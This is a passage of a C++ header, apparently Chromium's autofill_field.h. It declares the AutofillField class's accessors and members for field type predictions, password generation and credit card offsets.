heuristic autofill // type, depending on the data available for this field alone. // This type does not take into account the rationalization involving the // surrounding fields. AutofillType ComputedType() const; // Returns true if the value of this field is empty. bool IsEmpty() const; // The unique signature of this field, composed of the field name and the html // input type in a 32-bit hash. FieldSignature GetFieldSignature() const; // Returns the field signature as string. std::string FieldSignatureAsStr() const; // Returns true if the field type has been determined (without the text in the // field). bool IsFieldFillable() const; void set_default_value(const std::string& value) { default_value_ = value; } const std::string& default_value() const { return default_value_; } void set_credit_card_number_offset(size_t position) { credit_card_number_offset_ = position; } size_t credit_card_number_offset() const { return credit_card_number_offset_; } void set_generation_type( AutofillUploadContents::Field::PasswordGenerationType type) { generation_type_ = type; } AutofillUploadContents::Field::PasswordGenerationType generation_type() const { return generation_type_; } void set_generated_password_changed(bool generated_password_changed) { generated_password_changed_ = generated_password_changed; } bool generated_password_changed() const { return generated_password_changed_; } void set_form_classifier_outcome( AutofillUploadContents::Field::FormClassifierOutcome outcome) { form_classifier_outcome_ = outcome; } AutofillUploadContents::Field::FormClassifierOutcome form_classifier_outcome() const { return form_classifier_outcome_; } void set_vote_type(AutofillUploadContents::Field::VoteType type) { vote_type_ = type; } AutofillUploadContents::Field::VoteType vote_type() const { return vote_type_; } private: // Whether the heuristics or server predict a credit card field. bool IsCreditCardPrediction() const; // The unique name of this field, generated by Autofill. base::string16 unique_name_; // The type of the field, as determined by the Autofill server. ServerFieldType server_type_; // The possible types of the field, as determined by the Autofill server, // including |server_type_| as the first item. std::vector<AutofillQueryResponseContents::Field::FieldPrediction> server_predictions_; // The type of the field, as determined by the local heuristics. ServerFieldType heuristic_type_; // The type of the field. Overrides all other types (html_type_, // heuristic_type_, server_type_). // |AutofillType(NO_SERVER_DATA)| is used when this |overall_type_| has not // been set. AutofillType overall_type_; // The type of the field, as specified by the site author in HTML. HtmlFieldType html_type_; // The "mode" of the field, as specified by the site author in HTML. // Currently this is used to distinguish between billing and shipping fields. HtmlFieldMode html_mode_; // The set of possible types for this field. ServerFieldTypeSet possible_types_; // Used to track whether this field is a phone prefix or suffix. PhonePart phone_part_; // The default value returned by the Autofill server. std::string default_value_; // Used to hold the position of the first digit to be copied as a substring // from credit card number. size_t credit_card_number_offset_; // Whether the field was autofilled then later edited. bool previously_autofilled_; // Whether the field should be filled when it is not the highlighted field. bool only_fill_when_focused_; // The parseable name attribute, with unnecessary information removed (such as // a common prefix shared with other fields). Will be used for heuristics // parsing. base::string16 parseable_name_; // The type of password generation event, if it happened. AutofillUploadContents::Field::PasswordGenerationType generation_type_; // Whether the generated password was changed by user. bool generated_password_changed_; // The outcome of HTML parsing based form classifier. AutofillUploadContents::Field::FormClassifierOutcome form_classifier_outcome_; // The vote type, if the autofill type is USERNAME or any password vote. // Otherwise, the field is ignored. |vote_type_| provides context as to what // triggered the vote. AutofillUploadContents::Field::VoteType vote_type_; DISALLOW_COPY_AND_ASSIGN(AutofillField); }; } // namespace autofill #endif // COMPONENTS_AUTOFILL_CORE_BROWSER_AUTOFILL_FIELD_H_
2,502